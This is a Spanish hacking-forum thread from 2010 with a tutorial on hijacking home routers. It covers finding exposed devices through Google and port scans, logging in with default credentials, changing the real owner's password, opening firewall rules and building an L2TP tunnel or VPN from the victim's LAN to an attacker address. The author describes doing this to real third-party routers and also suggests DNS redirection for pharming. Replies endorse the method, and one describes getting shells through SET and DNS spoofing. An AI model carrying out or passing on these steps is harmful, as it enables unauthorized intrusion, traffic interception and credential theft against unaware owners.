Y tras el router… Qué? (Parte I)

Todo sobre seguridad, exploits, vulnerabilidades, bug's, etc.

Moderador: Moderadores

Y tras el router… Qué? (Parte I)

Notapor Vic_Thor » Lun Jul 05, 2010 3:34 am

Y tras el router… Qué?

Bueno… esto no es que sea del todo muy, bueno… ya me entendéis.

En este hilo preguntaba nuestro compañero jochy “Cómo atacar desde el router” viewtopic.php?f=4&t=5993

Bueno, pues la gente responde que si Upnp, que si hacer nat, que si meter un host a la DMZ, etc, etc…

Todas ellas son válidas, por supuesto, pero vamos a dar un par de pasos mas.

El primero, por qué no redirigir el DNS???

Pues claro!!! Si ya tenemos acceso al router podemos enviar las peticiones de los legítimos clientes de la LAN a un DNS bajo control del atacante, luego éste puede responder con las resoluciones que mas interese… con lo cual eso del pharming, phising, etc, está servido.

De hecho, se pueden hacer auténticas “diabluras” y con poco “esfuerzo” por parte del atacante. Si el “atacante” además de simplemente sustituir la resolución de nombres por las falsificadas está un poco espabilado, puede juguetear con proxys inversos de tal forma, que además de soplarle las contraseñas de autenticación tipo Facebook, foros, etc… no tiene ni porque “falsear” la web auténtica.. ni hacer complicadas páginas que “parezcan” iguales a las originales, sencillamente puede hacer pasar por su máquina todo lo que se le antoje.

Interesante, no?? Pues eso para otro post, que en este toca otra cosa…

En el hilo que anteriormente mencionaba, el de jochy, respondí algo así:

“Si tienes acceso al router (a su configuración) y si es un router "majo" puedes hasta crear un túnel (incluso vpn) con otro router de internet... puedes hacer pasar TODO el tráfico de esa lan por tu ordenador (tu sabrás lo que haces luego con eso) y/o si configuras una vpn, pues eso... que como si estuvieses sentadito en esa red.
….
….”


Esa respuesta tiene dos vertientes:

1.- Hacer pasar el tráfico de esa red por tu lan
2.- Crear un túnel y/o VPN para conectarte a esa Lan desde tu PC.

En este post tratamos sólo el caso 2 (que ya es bastante) y también dejaremos el caso 1 para otro momento…. Así que por ahora tenemos pendiente el tema de los DNS y del enrutamiento hacia la máquina del atacante que podríamos llamarlo algo así como “esnifar desde Internet”

Como todo en la vida lo que vamos a realizar requiere de algunos conocimientos (pocos) para por lo menos saber lo que estamos haciendo y también de las herramientas necesarias.

Para “manipular” el router remoto y acceder a la lan que protege necesitamos:

a.- Acceder al router como administrador
b.- Que el router permita la creación de túneles y/o VPN
c.- Que el atacante disponga de un router que permita lo mismo y/o usar clientes de conexión VPN

Lo mas sencillo sería que el atacante utilice un router idéntico al de la víctima, por supuestísismo que esto no es obligatorio, pero simplifica las cosas si queremos crear (por ejemplo) un túnel sitio-a-sitio (obviamente el atacante ya se asegurará de bloquear las conexiones que inicien los clientes-víctima hacia su propia LAN y permitir sólo las que inicie él)

Lamentablemente Internet está lleno de routers expuestos a este tipo de ataques… principalmente porque los colocan así como vienen de fábrica y no se preocupan o no saben ni cambiar el pass de acceso, por ello hay que ser “legales” y tomar este documento como un estudio y no como un arma.

Por ejemplo, supongamos que tenemos un router BT Voyager, SAR110-130, etc…, NetGear DM600, DLink RTA o cualquiera de esos GlobeSpanVirata o Viking.

Buscar “indefensos” propietarios de esos routers en Internet es juego de niños, basta con ir a Google, buscar en foros, blogs, etc… y los encontramos sin mas.

Veamos un ejemplo… Supongamos que queremos encontrar uno de ellos, (como “novedad” lo vamos a ver en un vídeo)



Como ves, acabamos de encontrar (Google lo encontró) unas cuantas entradas…

Escogí la segunda esa que pone login, en ella vemos una ip, así que vamos escanear el rango de ip’s que nos mostraba Google.

Para ello podemos usar cualquier escáner, yo escogí superscan que es muy rápido y sólo los puertos 80, 23 y 8080… tras unos pocos intentos… lo encontramos:



En el vídeo vemos que se trata de un router GS8100, por lo que vamos a necesitar ls documentación del mismo para poder crear el túnel.

Este tipo de Routers basados en GlobeSpanVirata no permiten la configuración de túneles y vpn por el interface web, toca hacerlo por línea de comandos.

Así que buscamos la documentación:



Vale, ya tenemos el manual y todo…

Para crear un tunel L2TP entre ese router y el nuestro tendríamos que poner algo así:

Código: Seleccionar todo
$create l2tp tunnel config ifname l2t-0 localip 190.42.42.236 remoteip 88.6.15.2 localhostname RASCA remotehostname PICA start initiator remote


donde localip es la direccion ip de “la víctima” y remoteip es la direccion ip del atacante.

Obviamente el atacante, debería también configurar su router “dando la vuelta” a los parámetros…

Código: Seleccionar todo
$create l2tp tunnel config ifname l2t-0 localip 88.6.15.2 remoteip 190.42.42.236 localhostname PICA remotehostname RASCA start initiator local


El video:



Desgraciada o afortunadamente ese modelo de router no cuenta con el firmware actualizado para implementar túneles y/o VPN, hombre… ya puestos podríamos actualizarle el software al router (cosa que no voy a hacer) pero podría ser así:



No le actualicé el firmware (por supuesto) aunque a lo mejor le venía hasta bien, jejeje, pero entre otras cosas como tiene ip dinámica después del upgrade hay que reiniciarlo y claro, ya no será la misma Ip y habría que buscarlo de nuevo (cosa que tampoco sería gran problema, pero mejor no tocarlo)

Así que con las mismas, vamos a buscar otros routers “vulnerables” mejor con IP fija y a ser posible que no haya que actualizarles el firmware….

Para esta práctica… pues buscamos lo “fácil” que son los Zyxel de telefónica.

Digo que son los fáciles porque averiguar rangos de ip’s estáticas de telefónica es una sencilla consulta en Google o en RIPE, y saber si el router lleva el firmware actualizado basta con ver en las cabeceras de la conexión http algo así como:

Código: Seleccionar todo
http/1.1 401 Unautorized.WWW-Autenticate: Basic realm=”Prestige 650H/HW-33”…


En este video vemos el scan de esa red… permitidme que distorsione las mismas, son estáticas y … bueno, por si acaso….



Vale, ya tenemos a nuestro “conejillo de indias”, no sé quienes o quienes son, vamos a ver como está ese router, una cosa… como “no quería” que el auténtico propietario del router accediese al mismo mientras “trabajaba” pues simplemente le cambié la contraseña… luego lo dejaré todo como lo encontré.

Además, para crear la VPN va a ser necesario poner la IP o el nombre de dominio del atacante… vamos, que si acceden al router podrán ver nuestros datos… y eso no está bien.

De éste vídeo averiguaremos que:

* La dirección de la LAN que utiliza es 192.168.0.0 255.255.255.0
* La dirección IP del router interna es 192.168.0.1
* No tiene activado el Firewall
* No tiene activado ningún túnel ni VPN
* No tiene reglas internas de firewall
* No tiene reglas externas de firewall
* No hay Logs ni para VPN ni para el firewall
* NAT hacia la dirección 192.168.0.100 para escritorio remoto (puerto 3389 de TCP)

Lógicamente si no tiene el Firewall activado es normal que no disponga de reglas para el mismo y tampoco existan logs

También es lógico que al no existir VPN definidas tampoco existan reglas ni logs de acceso.

Una cosa importante!!!! Que luego volveré a recordar, cuando activemos el cortafuegos que no se nos olvide añadir reglas de permiso desde Internet hacia el router por los puertos 80 y/o 23 puesto que si no lo hacemos así, perderemos la conexión por la web o Telnet con el router…

Lo vemos, entonces…



Bueno, en el siguiente video vamos a habilitar el firewall con las reglas que nos permitan conectarnos mediante un cliente VPN o un router para poder crear el túnel cliente a sitio o sitio a sitio.

También vamos a añadir las reglas necesarias para Telnet y para el puerto 80 de http y bueno… meteremos también icmp para comprobar que está online mediante un ping.

Las reglas del firewall se pueden/deben aplicar desde la LAN a Internet y desde Internet a la LAN, la primera serán los puertos y/o protocolos que permiten a los clientes de la red salir a Internet y la segunda lo contrario, lo que se permite desde Internet a la red local.

También es importante advertir que hasta que el firewall no esté activo ninguna de las reglas se aplican, recordad activar el firewall DESPUES de añadir las reglas o perderéis la conexión.

De momento veamos el vídeo para crear las reglas internas que por defecto le vamos a dejar salir por todos los puertos y protocolos, y las reglas externas que filtramos las conexiones desde Internet únicamente a 80 y 23 de TCP mas lo del ICMP

Como vimos antes, el administrador de este router hizo nat hacia una máquina por el puerto 3389 (Escritorio remoto) pues también crearemos esa regla para que lo pueda seguir haciendo una vez apliquemos las reglas y activemos el cortafuegos.

También podríamos dejar pasar el protocolo DNS, no estaría mal… eso lo haremos luego de otra forma a lo que veremos a continuación



Vale, ahora tocan las reglas de la VPN, en esta ocasión en lugar de crear una regla para cada puerto-protocolo, vamos a agruparlas TODAS en una sola, el efecto es el mismo que si definimos una por una… pero es mas corto… a ello:



Según hemos visto, permitimos IPSEC, GRE, PPtP, AH e IKE, no es preciso que estén todos ellos, depende de la vpn que deseemos crear, en nuestro caso no sobrarían GRE y PPtP, pero bueno… por si acaso me/nos da por crear un túnel “versus RRAS de Windows Server” (este utiliza PPtP 1723 de TCP) o por si nos da por un Cisco con GRE… vamos que ya lo tenemos.

También habréis notado que habilité los logs para en las reglas del firewall para la VPN, esto lo hago por si acaso hay algún problema en la conexión poder ver los mensajes de error, por ejemplo problemas de autenticación, apertura del túnel, etc…

Nos faltaría activar el firewall y crear la VPN, ahora lo hacemos:



Antes de configurar la VPN hay que saber la configuración del atacante, es decir, de mi equipo, router, ip’s…



Resumiendo, configuración LOCAL del atacante:

Código: Seleccionar todo
IP: 172.28.1.48 255.255.255.0
IP Interna del Router: 172.28.1.10
IP Pública del Router: 83.60.158.126


La configuración de la Víctima:

Código: Seleccionar todo
RED: 192.168.0.0 255.255.255.0
IP interna del router: 192.168.0.1
IP Pública del router: xxx.xxx.xxx.xxx (ya sabéis por qué no la pongo…)


Esto (o parte de esto) hay que ponerlo en la configuración de la VPN, vamos…



Vale, pues ya tenemos la VPN creada, ahora sólo hay que “probar”

Necesitamos un cliente VPN y configurarlo con los parámetros del servidor VPN, nos vamos a descargar uno cualquiera (el vpn client de cisco mejor no que tiene sus particularidades…) yo escogí este:

TheGreenBow vpn client, lo podemos bajar de aquí:

http://www.thegreenbow.fr/cgi-bin/thegr ... ent.exe?EN

La instalación es como las de siempre… siguiente, siguiente, …. Y finalizar.

Eso si, es MUY IMPORTANTE que tras la instalación del cliente vpn REINICIES el equipo o no funcionará.

Ahora veamos esto, lo primero que hay que hacer es ELIMINAR toda la configuración inicial y crear la nuestra propia….



Y tras eso, pues bueno… podemos escanear la red 192.168.0.0 en busca de equipos, recursos compartidos, etc…

Pues eso, que espero que haya sido “instructivo” y que lo disfrutéis… pero… hombre, no pensarás que te vas a escapar de la “carga teórica”, eh!!

Recuerdo que hace años puse unos pdfs de VPN, no sé si aquí o en el extinto HxC, pero bueno, vamos a hacer un repaso rápido a la VPN de esta práctica, pero como no me lo permite el sueeeeñoooo que tengo lo haré a lo largo de la semana.
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Re: Y tras el router… Qué?

Notapor NewLog » Lun Jul 05, 2010 11:09 am

Me he quedado a la mitad del texto (estoy en el curro y no es plan :P, pero no podía pasar por alto un post tuyo), aun así el video enseñando como buscar la documentación del router no tiene precio :embudito: :embudito:

Esta tarde acabo de leermelo. El nuevo formato de video luce mucho jejeje


Saludos y bueno es verte por aquí!
Imagen
http://www.overflowedminds.net - Quieres introducirte al exploiting?
Avatar de Usuario
NewLog
<|:-D
<|:-D
 
Mensajes: 1130
Registrado: Sab Ene 14, 2006 1:03 am

Re: Y tras el router… Qué?

Notapor vlan7 » Lun Jul 05, 2010 11:24 am

Hombre Vic_Thor, ya se te echaba de menos por el foro, que alegria verte de nuevo dando guerra.

Sin habermelo leido aun, de antemano se agradece el post, tiene buena pinta :)

Un saludo.
There is a crack, a crack in everything That's how the light gets in. -subculture

zen7.vlan7.org
Avatar de Usuario
vlan7
<|:-D
<|:-D
 
Mensajes: 1176
Registrado: Dom Mar 05, 2006 11:16 pm
Ubicación: Mas alla del EIP

Re: Y tras el router… Qué?

Notapor cirus » Mar Jul 06, 2010 9:10 am

Yo tambien estoy en el curro y solo he podido leer la mitad! cuando llegue a casa lo primero sera leerlo entero.
muy chulo el video.
P.d: Gracias por el post!
P.d:2 Das miedo Vic_thor ;)
Me encanta el sonido del SAI por la mañana!!!
Imagen
Imagen
Avatar de Usuario
cirus
:-D
:-D
 
Mensajes: 132
Registrado: Sab Sep 02, 2006 6:19 pm
Ubicación: BcN

Re: Y tras el router… Qué?

Notapor NeTTinG » Mar Jul 06, 2010 11:59 am

Hola:

¡Gracias por compartirlo, Vic_thor!

Me viene como anillo al dedo, dispongo de un escenario perfecto para probar todas estas cosas... Espero con impaciencia: ¡Lo de los proxys inversos! Parece muy interesante... y oscuro jejeje :p

Hace unos días estuve probando La LiveDVD Black | Track 4, más concretamente, Las SET (Social Engineering Tools), que para aquellos que las desconozcan se trata de un kit de herramientas para pruebas de penetración basados en ingeniería social... Estas herramientas nos permiten suplantar la identidad de unha URL, enviar ataques por correo electrónico a cuentas de correo, infectar memorias usb o cds/dvds infectados, incluso conseguir unha shell del equipo atacante...

Lo cierto es que este grupo de herramientas son ¡¡increíblemente ACOJONANTE!!

Eso si, algunas no he conseguido que funcionen como me gustaría... Aprovechando mis dos conexiones a Internet, una a través del iPhone, he intentado lazar ataques de este tipo a nivel Internet, pero he obtenido resultados muy dispares y muy diferentes con diversos equipos... Aunque entiendo que deberían de funcionar, bueno, eso creo...

Lo cierto es que conseguir unha shell de casi cualquier host Windwos (tipo escritorio) de una Wireless puede resultar cosa de niños... Utilizando estas herramientas combinadas con dsniff y ataques DNS spoof... ¡¡pueden ser mortales!! No es necesario encontrar el último exploit para el sistema operativo, para los servicios que están corriendo, etc... Tan solo que la víctima visite Google, algo bastante coherente si tenemos una conexión a Internet y que acepte un aviso... De no hacerlo, no podría visitar Google...

Vic_Thor escribió:no tiene ni porque “falsear” la web auténtica.. ni hacer complicadas páginas que “parezcan” iguales a las originales, sencillamente puede hacer pasar por su máquina todo lo que se le antoje.


Esto puede resultar una tarea bastante "engorrosa", dependiendo de lo que queramos hacer... Pero desde luego con SET, se simplifica bastante, basta con indicar la URL de la original y esperar unos segundos y si estamos en un LAN/WLAN solo nos queda hacer DNS Spoof, con herramientas tan sencillas e intuitivas como son CAIN o dnsspoof...

Creo que me he extendido demasiado :roll: :roll:
| Blog NeTTinG | Proyecto Destripando iOS |
_____________________________
Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas. (Albert Einstein)
Todos recaerán en la necesidad de conocer la única y presumible verdad que el gran embudo emana. (Sire Netting)
Avatar de Usuario
NeTTinG
Wadalbertita
Wadalbertita
 
Mensajes: 6270
Registrado: Mar Sep 20, 2005 5:54 pm
Ubicación: Bajo la trampilla del décimo primer piso.

Re: Y tras el router… Qué?

Notapor NeTTinG » Mar Jul 06, 2010 12:00 pm

Hola:

Por cierto, creo que se merece un post-it ;)
| Blog NeTTinG | Proyecto Destripando iOS |
_____________________________
Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas. (Albert Einstein)
Todos recaerán en la necesidad de conocer la única y presumible verdad que el gran embudo emana. (Sire Netting)
Avatar de Usuario
NeTTinG
Wadalbertita
Wadalbertita
 
Mensajes: 6270
Registrado: Mar Sep 20, 2005 5:54 pm
Ubicación: Bajo la trampilla del décimo primer piso.

Re: Y tras el router… Qué?

Notapor Yorkshire » Mar Jul 06, 2010 11:14 pm

Me lo he leido y visto.

La pena es que me faltan horas para disfrutarlo de forma práctica. :(

Gracias por el post, Vic_thor!
Linux registered user #346840
Avatar de Usuario
Yorkshire
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 4488
Registrado: Mié Ene 26, 2005 5:05 pm
Ubicación: -<|:-P[G]

Re: Y tras el router… Qué?

Notapor jochy » Mié Jul 07, 2010 12:50 am

Saludos.
ya lo me lo he leido y estoy poniendolo en practica.
Gracias Vic_Thor y animo con lo de:
1.-Hacer pasar el tráfico de esa red por tu lan
jochy
:-D
:-D
 
Mensajes: 120
Registrado: Vie Mar 27, 2009 4:04 am

Re: Y tras el router… Qué?

Notapor wearth » Jue Jul 08, 2010 7:38 pm

Aún no lo empecé a leer, pero ver de autor a Vic_Thor.. el instinto le ha dado a print.. ;-)

GRacias una vez más por el aporte! =)

Saludos
"Cuando el carro se haya roto, muchos os dirán por donde no se debía de pasar.."
wearth
<|:-)
<|:-)
 
Mensajes: 358
Registrado: Sab Dic 01, 2007 10:52 am

Re: Y tras el router… Qué? (Parte I)

Notapor Vic_Thor » Jue Jul 15, 2010 3:08 am

Bueno... pues la parte II

Aqui: viewtopic.php?f=4&t=6022

Saludos.
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Re: Y tras el router… Qué? (Parte I)

Notapor Vic_Thor » Lun Ago 23, 2010 1:42 am

Os paso los enlaces de todos los vídeos (hasta ahora) por si se pierden...

Parte 1: http://www.megaupload.com/?d=NMPMSFGA

Parte 2: http://www.megaupload.com/?d=X0A0QYTE

Parte 3: http://www.megaupload.com/?d=0YE9P7E1

Parte 4: http://www.megaupload.com/?d=AW396I02

Contraseña para descomprimir: El_Lider_DWFP
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Re: Y tras el router… Qué? (Parte I)

Notapor Ramms+ein » Vie Ago 27, 2010 9:06 am

Buenas *;

Creo que hay pocos routers hoy por hoy de ISPs que tengan posibilidad de VPN, al menos yo no he tenido nunca uno :(

Habrá que buscarse uno.

Gracias por compartirlo!!
<--! Mit diessem herz hab ich die macht -->
Avatar de Usuario
Ramms+ein
:-D
:-D
 
Mensajes: 56
Registrado: Mié Abr 19, 2006 12:52 am
Ubicación: - No Mundo -

Re: Y tras el router… Qué? (Parte I)

Notapor mordiskos » Mié Oct 27, 2010 12:26 am

Como siempre Vic_Thor, gracias por tus excelentes aportes.
mordiskos
:-)
:-)
 
Mensajes: 5
Registrado: Lun Jun 28, 2010 11:31 am


Volver a Seguridad

¿Quién está conectado?

Usuarios navegando por este Foro: Bing [Bot] y 1 invitado

cron